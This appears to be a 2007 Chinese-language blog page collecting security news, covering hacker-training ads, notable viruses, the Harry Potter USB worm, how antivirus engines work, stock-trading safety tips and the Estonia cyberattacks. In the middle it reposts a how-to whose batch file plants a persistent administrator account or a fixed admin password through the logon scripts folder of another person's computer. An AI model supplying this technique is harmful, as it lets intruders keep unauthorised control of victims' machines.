http://news.ccidnet.com/art/1032/20070702/1130523_1.html&cid=1114129665&ei=L66IRqS5KaPkqQPJjZSgCQ
Linux之父:酷睿2漏洞無關緊要 無需恐慌
發佈時間:2007.07.02 08:14 來源:賽迪網 作者:友亞
而英特爾發言人Nick Knuppfer在一份聲明中稱:“幾個月前,我們發佈了一款BIOS更新,解決了一個處理器問題。今年4月份,我們將其寫進了勘誤表內。長期以來,英特爾一直通過這種形式來通知消費者。請大家放心,遇到這些問題的可能性很小。”(責任編輯:胡祥寶)
趁暑期網上開班收徒 專門教授黑網站盜QQ號
http://www.rednet.cn 2007-7-2 9:08:04 紅網
一駭客在論壇發表的招收徒弟的帖子
“收徒弟,誠心學的先看後學,活動期間送會員+鑽:免費提供軟體,另有各個黑網站vip軟體,專業承接各種DDOS網路攻擊業務。 學會必技術與利益雙豐收……”記者在百度貼吧等多家IT論壇上看到,關於“駭客收徒培訓”的帖子比比皆是,而誠心拜師學藝的人更是大有人在。 暑期將至,每年的這個時期都是學生們最為放鬆的日子,而每年這個時期也是病毒最為倡狂的時期。也正是這段充裕悠閒的時間,使得許多對電腦有著濃厚興趣的人,難以抵制前述一類“收徒”帖的誘惑,開始了自己的“駭客之旅”。 記者在眾多“駭客收徒”發帖中看到,多數駭客都在極盡所能地標榜,通過向自己學習能牟取種種利益。僅有1位駭客聲明不會教授黑網站、盜QQ號及遊戲帳號、刷Q幣等。並稱N多人認為會盜Q號、入侵幾家網站就叫駭客,我的回答是NO。我個人認為駭客是知識很廣,如:程式設計、網路、腳本、系統、命令等。 我國電腦反病毒第一人、江民科技董事長王江民在接受記者採訪時指出,正是網路的開放性與匿名性,在滿足了人們溝通、娛樂需求的同時,也給人們帶來了不少負面的影響。目前,青少年利用駭客技術編寫電腦病毒,實施網路攻擊的行為已經十分嚴重。據相關調查顯示,病毒製作者的年齡也在逐年減小,越來越多的初、高中生和大學生加入到了製作和傳播電腦病毒的隊伍。這也使得網路犯罪日益倡狂,嚴重影響了互聯網的安全。 一位受訪的業內技術專家告誡道:“鑽研電腦技術一定要走正路,廣大青少年應該樹立良好的價值觀,把自己的聰明才智用到為社會創造價值上來,不要盲目地崇拜和追捧網路駭客,更不要為一時的負氣而做出讓自己終身後悔的事。” [稿源:北京娛樂信報]
中國 細數古今病毒木馬之“四大惡人”
出處: 網路世界 作者: 佚名 2007-06-29 09:30
家用電腦中毒,輕則會使得個人的資訊和資料丟失、工作的心血付之東流;重則會使個人隱私和銀行帳號等機密資訊被洩露和竊取。商用電腦就幾乎沒有輕重之分了,一台電腦感染了病毒之後會致使公司整個網路內的電腦被傳染,公司的運作會陷入癱瘓,公司的機密研究成果或資金都有可能被破壞和盜取。
臭名昭著“史上第一惡人CIH病毒”
電腦病毒其實很早就出現了,不過當初的它們只是作者寫出的一些錯誤邏輯運算罷了,還沒有被重視起來,可第一次讓人們見識到並且開始意識到這種東西會對個人電腦有如此大的殺傷力,那就非CIH莫屬了。
後門病毒老大“灰鴿子”
MADE IN CHINA,武漢男孩指使熊貓燒香
橫空出世,無法無天的“帕蟲”
此外,經過“帕蟲”的精心“策劃”,用戶電腦的安全防禦體系被徹底摧毀,安全性幾乎為零,而“帕蟲”並未就此罷手,自動連接到擁有病毒的網站,並自動下載數百種木馬病毒,各類盜號木馬、廣告木馬、風險程式使用者電腦毫無抵抗力的情況下,魚貫而來,用戶的網銀、網遊、QQ帳號密碼以及機密檔都處於極度危險之中。因此提醒電腦用戶目前使用電腦需慎之又慎。
關聯資訊顯示:“該病毒採用了多種技術手段來保護自身不被清除,例如,它會終結幾十種常用的殺毒軟體,如果使用者使用google、百度等搜尋引擎搜索‘病毒’,流覽器也會被病毒強制關閉,使得使用者無法取得相關資訊。尤為惡劣的是,該病毒還採用了IFEO劫持(windows檔映射劫持)技術,修改註冊表,使QQ醫生、360安全衛士等幾十種常用軟體無法正常運行,從而使得使用者很難手工清除該病毒。
http://www.sophos.com/pressoffice/news/articles/2007/06/hairy.html
With just weeks remaining until the release of the last ever Harry Potter novel, and the imminent premiere of the fifth movie in the franchise, Sophos has warned of a new computer worm exploiting Potter-mania around the world.
The W32/Hairy-A worm spreads by copying itself onto USB memory sticks, posing as a copy of the eagerly-anticipated novel "Harry Potter and the Deathly Hallows".
Windows users who allow affected flash drives to 'autorun' are automatically infected by the worm when it is attached to their PC. A file called
HarryPotter-TheDeathlyHallows.doc
can be found in the root directory of infected USB drives. Inside the Word document file is the simple phrase "Harry Potter is dead."
After infecting Windows computers, the worm creates a number of new users - namely the main characters from JK Rowling's celebrated series of books about student wizards: Harry Potter, Hermione Granger and Ron Weasley.
After logging in, users are shown the following message via a batch file:
read and repent
the end is near
repent from your evil ways O Ye folks
lest you burn in hell...JK Rowling especially
In addition, everytime infected users open Internet Explorer they will find their start page has been redirected to an Amazon.com web page selling a spoof book entitled "Harry Putter and the Chamber of Cheesecakes".
"Much of the world is waiting with bated breath for the final Harry Potter novel, and the premiere of the new movie is looming too. There is a real danger that muggles will blindly allow their USB flash drives to auto-run and become infected by this worm," said Graham Cluley, senior technology consultant for Sophos. "Using such social engineering at this time is a trick dastardly enough for Lord Voldemort himself."
Read more about this worm on the SophosLabs blog
"Seriously, the fact that this worm has been inspired by the tales of a fictional schoolboy wizard doesn't make it a harmless prank," continued Cluley. "A worm like this which infects and tampers with users' computers without their permission is committing a criminal act. Someone needs to get a little more sunshine in their diet and put their energies into a more positive pursuit than writing malicious code like this."
Recently experts at SophosLabs™, Sophos's global network of malware and spam analysis centers, have reported an increasing trend for malware authors to spread via USB devices.
Sophos recommends companies protect themselves with a consolidated solution which can defend against the threats of viruses, spyware, spam and hackers.
http://article.pchome.net/content-390771.html&cid=1113975513&ei=v9SBRtm-FY6WrgOJhJnBBw
安全知識:殺毒軟體引擎技術之窺探
CNET中國·PChome.net 類型:轉載 作者: 責編:楊劍鋒 時間:2007-06-27
一. 群雄逐鹿的殺毒軟體市場
學校機房新購入了一批電腦,負責安裝應用程式的李老師在殺毒軟體的選擇上犯了難,由於機房環境的複雜,如果不安裝殺毒軟體,勢必會因為使用者帶來運行的媒體介質感染了病毒而造成系統癱瘓或交叉感染,無論出現哪種情況都會影響上課進度和效率;但是,如果安裝的殺毒軟體功能不夠強大,無法及時更新資料,一樣不能防止病毒造成破壞。李老師考慮再三,還是決定來到電腦市場購買正版殺毒軟體,但是面對市場上眾多品牌的殺毒軟體,他又犯了難:瑞星、金山、江民、Norton、趨勢、熊貓、卡巴斯基、McAfee……每一款殺毒產品都具備它自己的優缺點和特色,我該選擇哪一種呢?
二. 從病毒原理說開去
病毒的定義和行為特徵
在這個年代裡,電腦病毒(Computer Virus)已經是家喻戶曉的名詞了,而其在業界裡也早已有了定義:電腦病毒是指編制或者在電腦程式中插入的破壞電腦功能或者毀壞資料影響電腦使用,並能夠自我複製的一組電腦指令或者程式碼,它可以是一個程式,一段執行代碼,像生物病毒一樣有獨特的複製能力,可以很快蔓延。他們能把自身附著在各種類型的檔上,隨檔的傳播而蔓延。現在隨著電腦網路的發展,病毒和網路技術結合,蔓延的速度更加迅速。電腦病毒具有可執行性、寄生性、傳染性、破壞性、欺騙性、隱蔽性、潛伏性、衍生性。
以上便是早期就已經定義好的電腦病毒概念,而如今可稱為病毒的,還有各種不會感染檔的特洛伊木馬程式(後門)等(Trojan、BackDoor),大部分特洛伊木馬除了不具備對文件的傳染性以外,其他特徵均與病毒符合,而且一部分檔型特洛伊木馬還可感染檔。此外,還有一種通過系統漏洞進行傳播的惡意程式或“蠕蟲”(Worm),利用系統自帶的指令碼語言功能實現破壞效果的巨集病毒和惡意腳本(Macro Virus、Evil Script),因此,文中將把木馬後門、蠕蟲、巨集病毒和傳統檔型病毒等統稱為“病毒”。
自我複製
病毒的基本動作是複製自身,檔型病毒會把自身插入正常程式檔內部以便程式每次執行時連病毒代碼也一併執行,惡意程式或木馬後門會將自身複製到系統目錄,然後通過多種途徑令系統在啟動時執行病毒體檔,但是無論是哪種病毒的複製行為,其最終目的都只有一個:潛伏到使用者電腦內,伺機執行各種危害操作。
病毒在執行複製行為時必須隱蔽,否則它會輕易被稍有經驗的用戶發現,因此不同的病毒都會採取各種手段來實現其隱蔽目的,但是無論它們的表現形式如何,最終都可歸納為兩種形式:寄生和欺騙。
寄生
這是檔型病毒的傳播方式,檔型病毒的成品一般沒有自己的獨立程式體,它們通過受感染的可執行檔進行傳播。當使用者執行一個感染了檔型病毒的程式時,由於原程式的執行入口已經被破壞,因此病毒代碼會首先得到執行,將自身載入記憶體中,成為一個“駐留程序”(TSR),根據病毒作者的破壞性差異,病毒可能僅僅停留在記憶體空間裡等待使用者執行程式時進行感染操作,也可能會主動出擊,搜索使用者電腦上符合感染條件的可執行檔進行感染。
較普通的檔型病毒會將自身代碼放置到受感染檔的頭部或尾部,而後修改檔頭部的執行入口指向自身代碼起始段,以達到自身先於受感染程式執行的目的,當病毒在入記憶體後,才會去調用受感染檔的真正執行入口,讓受感染檔能夠運行,這樣用戶才不會起疑心。在早期的感染模式裡,檔型病毒通常會主動搜索感染可執行檔,甚至因為感染失敗而導致檔損壞的事情也常有發生,而自從微軟在Windows 2000開始引入“系統檔校驗”技術後,主動搜索可執行檔進行感染的病毒寄生技術便因為導致系統不斷出現“系統檔遭遇替換”的警告而逐漸退出舞臺,繼而換成守株待兔類型的等待程式執行後進行感染的被動寄生方式。較新的檔型病毒還會採取不感染系統檔的政策,讓用戶無論如何都難以發現檔被感染的痕跡。
欺騙
並非所有病毒(注意此文的“病毒”所指範圍)都是檔型的,例如特洛伊木馬、蠕蟲和惡意程式等,那麼它們如何將自身隱蔽呢?這就要用到欺騙了。所謂欺騙,就是利用各種手段將自身執行檔植入系統,而不被使用者輕易察覺,即使被發現,也難以判斷真偽或者無法徹底刪除,從最初的簡單設置檔案屬性為隱藏,到現在的偽裝系統核心檔、DLL形式,甚至驅動程式類型的隱藏,病毒技術的不斷發展使得手工查殺增加了難度。
破壞
一個程式是否具備破壞性是衡量它是否屬於病毒的一個重要標準,病毒的破壞是多種多樣的,其實在它們進行寄生或欺騙操作時就已經對被感染的檔、以及受害電腦的環境完整性形成一定的破壞了,由於病毒需要駐留記憶體進行感染操作,直接導致的影響就是磁片讀寫增加,電腦回應遲鈍,更有甚者為了取得最高的回應速度,而修改系統正常的優先順序設置讓自己達到最高等級,從而導致系統效率嚴重下降。然而這還不是真正可怕的,當病毒發作時,可能會破壞你的檔檔案,或者敞開電腦大門讓入侵者隨意進出,甚至通過特殊的軟體讀寫達到破壞電腦硬體的目的。
三. 剖析殺毒軟體的心臟——引擎技術
病毒和反病毒產品是天生的冤家,由於病毒永無休止的存在,反病毒產品這片領域自然也會出現眾多廠商來分割的局面,因此也就銜生出了多種殺毒引擎技術。
殺毒引擎是決定一款殺毒軟體技術是否成熟可靠的關鍵,什麼是殺毒引擎呢?簡言之,它就是一套判斷特定程式列為是否為病毒程式或可疑程式的技術機制,引擎不僅需要具備判斷病毒的能力,還必須擁有足夠的病毒清理技術和環境恢復技術,如果一款殺毒產品能查出病毒但是卻無法清除、或者無法將被病毒破壞的系統環境成功恢復,那它也只能是雞肋。為了達到查殺病毒的目的,殺毒引擎自身要實施的行為就要比病毒還病毒。
例如,為了及時獲得環境變動的監控資料,一些殺毒引擎採用DLL的鉤子技術將自身注入系統進程中,這一行為和DLL木馬無異;而為了成功攔截查殺驅動級別木馬Rootkit,殺毒引擎更需要將自身的一部分作為驅動形式運行,以便進入系統內核領域……說到這裡,一些電腦配置較低的使用者應該能明白,為什麼自己安裝殺毒軟體後電腦速度明顯變慢了,這多半是因為殺毒軟體的“檔監控”等功能導致的,因為這一功能的實現原理就如檔型病毒的寄生過程一樣,只不過檔型病毒是守候在記憶體中伺機感染每一個打開的檔,而“檔監控”功能是時刻駐守在記憶體裡檢查每一個打開的檔是否存在病毒,兩者導致的後果都是程式載入記憶體的時間增加,在低配置的電腦表現得比較明顯罷了。
由於以上提到的原因,殺毒軟體是會不可避免的對使用者電腦運行速度造成一定影響的,但是為了安全,大部分用戶只能犧牲一點工作效率來換取安全了,那麼,殺毒引擎的具體實現過程又是如何呢?且讓我們來對其窺探一番。
1.守住每一個關卡——程式列為捕獲
每個程式運行時都需要進行各種交互動作,如收發網路資料、回應某個觸發事件、檔讀寫操作等,這些交互都被稱為“行為”(Action),這個週期過程是可以被跟蹤記錄的,這就是殺毒引擎必須干涉的第一步,當殺毒軟體的環境監視模組啟動後,它會嵌入系統的操作介面,使得任何非核心程式和除了殺毒軟體自身程式的運作過程都要被它即時監視,這一技術通常通過鉤子技術和驅動層掛載實現,每個殺毒軟體廠商都預先定義了一套病毒行為判斷規範,即在一個給定的範圍和置信度下,判斷相關操作是否為合法。例如一個代碼執行後被發現試圖將自己寫入使用者請求執行的程式檔體內、或進行特定的複製動作和添加註冊表操作,則可將其懷疑為病毒,移交給查毒過程的第二步進一步判斷處理。
為了實現行為捕獲操作,殺毒軟體引擎必須將自身模組嵌入系統底層,在這個實現方法上,各大廠商都有自己的一套方案,一般廠商普遍採用的是中介軟體技術,即通過Hook掛鉤方式實現對每個進程的訪問,這種方案通過在系統底層與應用程式之間嵌入一個全域鉤子DLL模組達到目的,從嚴格上來說,它的相對安全和穩定性較低,但是在原始程式碼不開放的作業系統層面上,這是最簡單的方法。
一部分廠商因為與作業系統廠商存在合作關係,因而獲得了較其他廠商殺毒產品要高的作業系統特權,所以他們採用的方案是基於系統最底層的系統核心驅動,這種實現方式是最安全的,或者說最高級的實現方式,至今只有Norton獲得了這個特權。隨著病毒技術逐漸滲透到Rootkit層次,過去的Hook技術逐漸有點力不從心,於是殺毒廠商開始轉入驅動方案,當然,由於沒有作業系統廠商的授權,他們並無法實現最底層的核心驅動解決方案,於是殺毒廠商編寫了一個稱為“軟體驅動”的中介軟體,用於在系統中產生一個虛擬硬體。
眾所周知,在作業系統中,只有驅動模組能通過一個“硬體抽象層(HAL)”的通訊介面而到達系統底層,如今流行的Rootkit木馬也是採用驅動形式進入系統核心的,因此殺毒廠商使用“軟體驅動”來實現底層監視的方案是要比一般的Hook技術效果顯著的,但是這也不可避免會出現一些問題,如果這個“軟體驅動”存在缺陷或者被某些程式異常終止(例如出現未預料的錯誤),在系統底層無任何保護措施的環境下,最直接的一個後果就是系統藍屏崩潰,造成可能的損失。
引用(小知識:系統的幾個“層”)
作業系統作為一個複雜的運作體系,其內部是必須實現一定的功能模組來進行分工合作的,這些功能模組像金字塔一樣層層堆積,形成了系統的幾個“層”,分別是系統核心層、硬體抽象層、使用者層。
系統核心層(Kernel Layer)位於整個作業系統的最底層,負責系統的基本運作,在這一層裡的所有行為都由系統內置的指令來實現,所有外界因素都不會對這一處的行為造成影響。能直接進入這個層交互的程式不多,除了作業系統自身,協力廠商廠商若要能在此層直接工作,必須和系統廠商建立合作關係,使用系統廠商提供的介面函數才能進入。目前能在這個層面直接工作的殺毒軟體只有賽門鐵克的Norton AntiVirus。
硬體抽象層(Hardware Abstraction Layer)是美國微軟公司為了便於作業系統在不同硬體結構上進行移植而提出的將系統底層與硬體相關的部分獨立運作的思想,HAL為系統實現了“硬體無關性”,即在不同的硬體平臺上,硬體與作業系統的交互也不會有所差異。
用戶層(User Layer)就是平時我們直接看到的部分,例如桌面,大部分殺毒軟體也是在這一層運行的,主要用於使用者介面交互和將指令傳遞到殺毒引擎。一般運行於Ring3的程式列為也產生於此,一個應用程式產生的指令要求首先被傳遞到HAL層,HAL層將其解釋處理為核心層可以識別的指令串,然後提交給核心層最後進入cpu的指令處理迴圈,CPU處理完畢後將結果反向送回到使用者層上的應用程式,最終得到運算結果。
2.檢測的核心——基於引擎機制的規則判斷
這一步環節可以稱之為病毒判斷的核心階段,一個好的殺毒引擎能在這個階段識別出相當規模的病毒,其原理是在引擎中內置一部分病毒的特徵代碼,稱為“基於特徵碼的靜態掃描技術”,即殺毒引擎直接在檔中查找自身攜帶的特徵代碼,力求儘量在這一步發現病毒。早期的電腦使用者應該記得,當初的殺毒產品並沒有非常大的病毒碼資料庫,甚至KV300+的所謂病毒碼資料庫還是ASCII格式的,並由用戶自己手工加入,僅僅作為一種簡單的擴充手段來運作而已,這是因為KV300+的主程序內就已經包含了當時各種流行病毒的特徵碼。
但是如今由於網路普及和電腦技術發展,病毒攻勢鋪天蓋地而來,如果單純靠殺毒引擎自身攜帶病毒碼代碼,將會造成主程序體積過於龐大而無法高效率運行,且升級麻煩等難點,因而殺毒引擎不得不將病毒碼庫從自身脫離開來,形成獨立的病毒資料庫結構來與自身保持聯繫,這就是“基於特徵碼的靜態掃描技術”的擴展產物:病毒碼代碼資料庫。
由於上述原因,如今的殺毒軟體已經不得不採用外部資料庫連接的方法來達到識別病毒的效果,病毒碼代碼資料庫中以特定格式儲存了各種病毒的行為標識和靜態代碼,在工作時,殺毒引擎需要將捕獲到的程式列為轉換為它自身可以識別的行為標識和靜態代碼,然後進入病毒碼代碼資料庫中查詢並期待其返回查詢結果,因此這個步驟是整個殺毒過程中最慢的,但是不可否認,當前的殺毒軟體對大量病毒的識別都是在這個階段完成的。
4.月光寶盒——病毒查殺和系統環境恢復
當殺毒引擎檢測到病毒時,需要分為兩種情況對待,首先是尚未來得及進行感染或破壞行為的病毒,在這種情況下殺毒引擎只需要簡單刪除檔就可以了,但是日常操作中用戶面臨最多的還是已經被病毒實施感染破壞行為後的系統環境,在這種情況下,殺毒引擎必須在使用適當的方式查殺病毒後,根據病毒碼庫中記錄的病毒行為來智慧判斷當前系統環境遭受破壞的情況並進行恢復,例如對於受病毒感染的檔,殺毒引擎必須根據一定的演算法在檔體內找出病毒代碼寄生的部分並給予清除,這個過程必須非常謹慎,否則直接的後果就是導致原文件被破壞,這樣的殺毒就毫無意義了。
以上說的是殺毒引擎完整工作過程的原理,那麼,它所採取的技術有哪些呢?目前,主流的技術有兩種:虛擬機器技術、即時監控技術。除此之外,還有兩種最新的技術仍在試驗階段,分別是智慧碼標識技術和行為攔截技術。
一提起虛擬機器,部分讀者可能就會聯想到VMWare去了,然而這裡提到的虛擬機器並非如此。在反病毒界裡,虛擬機器也被稱為通用解密器,已經成為反病毒軟體中最重要的部分之一。殺毒引擎的虛擬機器技術並非是為病毒提供一套電腦模擬系統,讓其在內部折騰直到暴露出病毒行為特徵,在這裡的虛擬機器是指殺毒引擎類比出一個模擬CPU,這個“CPU”具備和真正CPU等同的指令分析功能,殺毒引擎將待檢測的程式碼讀入“CPU”中逐條指令迴圈執行,直到出現特定情況才結束工作,在這個過程中探知程式是否具備病毒行為特徵或者暴露出病毒碼碼。
但是即使再強悍的變形病毒也不可避免在運行時出現一段相對固定的機器碼,否則它自身也無法正常運行完成變形過程,而由於這段機器碼只有在運行時才能被捕獲到,因此工程師開發了“虛擬機器技術”誘使病毒在殺毒引擎產生的“CPU”裡盡情運行,而後根據其固定機器碼匹配病毒碼資料庫中的靜態特徵來判斷這個程式是否病毒。雖然這個技術可能會導致誤報,但是仍不能否認其是一種有效的方法。
即時監控技術,說白了其實就是一個檔監視器,它會在檔打開、關閉、修改等操作時將其攔截並送入查毒模組進行分析,而在如今的作業系統中要實現對所有檔操作的攔截並非易事,這需要涉及系統核心,因此,這裡所採取的方案原型,就是“軟體驅動”。通過驅動進入核心,便能獲知每個檔的操作情況並做出反應了。
這項技術的難度在於驅動代碼的編寫,由於內核沒有異常處理過程,在這裡執行的代碼稍有一點錯漏都能直接導致系統崩潰,且驅動與用戶層的即時交互也需要一套複雜的實現方案,因此只有一定實力的廠家才實現這項技術,且實現了這項技術的廠家大部分都會連同虛擬機器技術、靜態特徵碼掃描技術一起結合起來,最終形成自己的產品。
四. 結語
許多使用者都在挑選殺毒軟體時犯難,實際上,如果拋開許多表面上的東西,殺毒軟體的引擎實現技術也就那麼幾個,關鍵在於殺毒廠商的研發能力和實際工作效率,也不能只憑殺毒軟體在對付某種病毒的差別上就斷定它們之間的地位差異。符合自己使用的,就是最好的。
中國網路發佈--網上炒股需小心 股民安全八大注意
2007年06月25日14:31 來源:人民網
近日,由於股票市場的持續火爆,使得越來越多的新股民進入股市。據有關部門統計,目前每13個中國人就有1個炒股、每天A股開戶數新增30萬戶,我國已進入“全民皆股”時代。而網上炒股以其“交易方便快捷、信息量大,緊跟行情、輔助分析系統強大”等特點成為股民炒股的首選方式。
但據專家介紹,由於大多數股民缺乏基本的防護意識和措施,使網上炒股面臨極大的安全風險。
瑞星安全專家介紹,這些安全性漏洞主要存在於用戶自己的電腦中,銀行、證券公司的系統相對要安全一些,而駭客往往採取以下幾種手段來攻擊用戶。
一、網上詐騙(又稱網路釣魚)
同時,一些病毒感染使用者電腦後也會彈出假冒的視窗,引誘使用者輸入隱私資訊,達到相同的目的。
二、採用病毒、木馬攻擊
這類病毒的基本原則是“只偷竊不破壞”,因此有著很大的隱蔽性。使用者的電腦感染這類病毒後,沒有明顯的發作特徵,使用者幾乎察覺不到被病毒感染,而這些病毒則在後臺悄悄地運行,當使用者登錄網路銀行、證券系統時自動記錄輸入的資訊,並將這些資訊發送給駭客。
三、猜解密碼
對此,瑞星安全專家提出了“網上炒股的八大注意事項”:
第一、必須安裝殺毒軟體並且做到每天至少升級一次
一些用戶由於缺乏必要的安全防護知識,在遇到殺毒軟體發現病毒攻擊時往往不知 所措,還有一些使用者覺得殺毒軟體和防火牆的經常彈出提示資訊比較麻煩,乾脆將它們 關閉。這些都給駭客的攻擊帶來了便利。
第三、安裝卡卡上網安全助手
(這似乎是廣告)
第四、使用帶有USB KEY的網路銀行專業版進行交易
(AV病毒就是靠USB,所以USB最近不安全管道)
第五、到證券公司的官方網站下載炒股軟體
(也要確認官方網站是否為真正官方站/或是有被入侵的訊息 )
第六、充分利用瑞星個人防火牆的“密碼保護”功能
(這還是是廣告)
第七、設置較為複雜的密碼
第八、儘量不要在網吧等公共電腦上炒股
想取得資訊何其容易,本日中國紅網新聞中就教授大家「如何建立一個,不被殺掉,並擁有最大管理者權限帳號」這其實也是當惡意人士基礎入侵後,第一件要作或是嘗試要作的事,就是取得本地端權限,往往可以透過很多方法,最常見的就是以郵件或是各種可供程式啟動弱點,讓受害者不知情下作這件事情(莫名其妙就被人建立最大管理者),以下為本文(沒有打馬賽克是因為本文章為尊重新聞來源,但請勿以以下程序作非法用途,)
http://tech.rednet.cn/c/2007/06/25/1238379.htm
別人永遠刪不掉 建立管理員用戶小竅門
http://www.rednet.cn 2007-6-25 9:50:08 紅網
操作步驟:
1、在自己電腦裡面建立一個.txt文字檔.
2、在裡面輸入內容
@echo off
net user xixi 123456 /add
net localgroup administrators xixi /add
(注釋:前面xixi是用戶名,後面123456是密碼;)
3、把這個檔保存,更改尾碼為xixi.bat 注釋:前面名字隨便,後面格式一定要是bat;
4、把這個檔拷貝到對方電腦C:\WINNT\system32\GroupPolicy\User\Scripts\Logon檔目錄下,沒有的話自己創建。
完成,下次對方電腦無論如何都有這個管理員帳號,刪除了,下次啟動還有!
如果把裡面的內容改成
@echo off
net user administrator 123456 /add
意思是不管你怎麼改,下次啟動管理員帳號administrator密碼一直是123456。
[稿源:賽迪網]
[作者:smtk]
2007/06/24 14:05記者:郭無患
法國「世界報」報導,法國政府官員被建議不要使用「黑莓機」,因為美國國家安全局可能會從電子郵件中截取情報。
美國電子資料保密中心資深顧問恩古告訴法新社:「一個政府能說無線資料不太安全,使用時要格外小心,這是很好的事」。
恩古指出:「大家必須對此有所了解,我們知道多個政府機構,像是聯邦調查局,都曾未獲法院授權就尋搜情報,而國安局更表示無需核准」。
黑莓機製造廠商加拿大無線通訊公司(ResearchIn Motion)駁斥法國政府的擔心是無必要的反應,並表示,指稱美國間諜能窺探其網路是「有兩年之久,老掉牙的謠言」。
加拿大無線通訊公司表示:「沒有人,包括加拿大無線通訊公司本身也一樣,有能力檢視以黑莓機發送的任何數據資料,因為所有數據都是加密的」。
「電子郵件來源不能被追蹤,內容也無法分析」。
根據加拿大無線通訊公司的資料,全球大約有七十萬名政府人員使用黑莓機。
歐洲國家官員長久以來懷疑美國領導一項代號「梯隊」的計畫,這項計畫於冷戰時設立,目的在攔截並還原電子訊息,但在共產鐵幕崩解後,這項計畫就被用來窺探歐洲國家情報。
加拿大無線通訊公司駁斥相關說法為「不實和誤導」;但隱私權保護人士和駭客高手認為,隨著科技和時間演進,無線傳輸訊息被攔截破解,只是早晚的事。
2007/06/22 09:17記者:【陳大任】
一隻名為JS_DLOADER.NTJ的惡意程式最近在歐洲造成嚴重災情,單日最高記錄造成六萬台電腦遭殃,單是義大利就有四萬四千台電腦被入侵的惡意程式攻擊發出警訊。
趨勢科技技術顧問簡勝財說,駭客挑選安全防護較不完整的網站,並且植入惡意連結程式HTML_iFrame.CU,當做是擴散的跳板,只要網友點選此網站,電腦即會被連結到另一個IP位址,並植入名為JS_DLOADER.NTJ的惡意程式。此隻惡意程式會利用微軟IE中的MS04-040及MS06-057漏洞入侵電腦,以植入更多可竊取個人機密資料的木馬程式,此被入侵的電腦將被開啟後門,成為駭客散播惡意程式的工具,藉以造成更大規模的感染。
接下來的數波攻擊依序鎖定愛沙尼亞的報紙、電視台、學校,最後是銀行,引發經濟損害的恐慌。所幸之後攻擊逐漸轉弱,而後停止。愛沙尼亞國防部發言人Madis Mikko表示:「假設有飛彈攻擊你的機場,這就是戰爭行為。如果同樣的結果是由電腦造成,(除了戰爭之外)你還能稱這種攻擊是什麼?」
愛沙尼亞官員不論在公開或私下,皆指控俄羅斯在背後操控整起攻擊。14日舉行的北約(NATO)會議,愛沙尼亞國防部長Jaak Aaviksoo即要求盟國緊急討論大規模電腦攻擊對國家安全造成的威脅。北約發言人Robert Pszczel說:「大家都相當重視這類事件。今天遭殃的是愛沙尼亞,明天可能是任何國家。」
克宮則是不斷否認官方涉入這起攻擊,反控愛沙尼亞憑空捏造。但包括總理Andrus Ansip 在內的愛沙尼亞官員,都曾表示追蹤到攻擊源頭出自俄羅斯的電腦伺服器,包括由俄國政府和總統普丁內閣註冊的網域。
僅管愛沙尼亞政府發言人Martin Jasko 認為攻擊的時機和目標都構成合理的懷疑,這些電腦仍可能被第三方使用,因此很難證明俄國政府的涉入。近月來,俄羅斯與愛沙尼亞兩國因為是否移除蘇聯時代的戰爭紀念碑陷入爭端,俄國指責愛沙尼亞糟蹋過去蘇聯士兵抵擋納粹入侵的歷史記憶。
網路攻擊在愛沙尼亞決定移除紀念碑當天爆發,之後數天,俄國以修繕軌道之名,暫停兩國間的鐵路交通。莫斯科則在同時發生大規模的示威抗議,愛沙尼亞大使甚至遭到羞辱,政府高層也呼籲抵制愛沙尼亞產品。
攻擊的第一次高峰出現在5月3日,當天莫斯科爆發最激烈的示威抗議。另一次高峰是5月8日和9日,配合歐洲各國紀念戰勝納粹德國。但對許多愛沙尼亞國民而言,二戰勝利卻是長達半世紀蘇聯統治的開始,紀念碑正是其象徵。最後一波攻擊高峰是15日,該國最大的幾家銀行被迫暫停國外連線。
愛沙尼亞新成立的電腦緊急事件應變小組(Computer Emergency Response Team)首長Hillar Aarelaid說,隨著攻擊持續,來源似乎指向全球各地的電腦,包括越南和美國。他認為這些攻擊可能利用疆屍網路,網路上也流傳著俄國如何攻擊愛沙尼亞網站的指導說明,並建議繼續這次全球首見的網路戰爭。
Aarelaid說:「我們不敢說最大規模的攻擊已經過去,因為每一波都比前一波更大。」(陳智文/譯)
資訊安全 (4)